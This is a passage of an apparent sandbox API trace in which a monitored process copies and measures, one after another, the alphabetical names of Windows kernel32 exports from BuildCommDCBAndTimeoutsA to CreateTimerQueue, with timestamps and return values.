lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.885] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.885] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.885] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.885] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.885] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.885] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.885] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.885] lstrlenA (lpString="CANCELIO") returned 8 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.885] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.885] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.885] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.885] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.885] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.885] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.886] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.886] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.886] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.886] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.886] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.886] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.886] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.886] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.886] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.886] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.886] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.886] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.886] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.886] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.886] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.886] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.886] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.886] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.886] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.886] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.887] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.887] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.887] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.887] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.887] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.887] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.887] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.887] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.887] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.887] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.887] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.887] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.887] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.887] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.887] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.887] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.887] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.887] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.887] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.888] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.888] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.888] lstrlenA (lpString="COPYFILEA") returned 9 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.888] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.888] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.888] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.888] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.888] lstrlenA (lpString="COPYFILEW") returned 9 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.888] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.888] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.888] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.888] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.888] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.888] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.888] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.888] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.888] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.888] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.889] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.889] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.889] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.889] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.889] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.889] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.889] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.889] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.889] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.889] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.889] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.889] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.889] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.889] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.889] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.889] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.889] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.889] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.889] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.890] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.890] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.890] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.890] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.890] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.890] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.890] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.890] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.890] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.890] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.890] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.890] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.890] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.890] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.890] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.890] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.890] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.890] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.890] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.891] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.891] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.891] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.891] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.891] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.891] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.891] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.891] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.891] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.891] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.891] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.891] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.891] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.891] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.891] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.891] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.892] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.892] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.892] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.892] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.892] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.892] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") 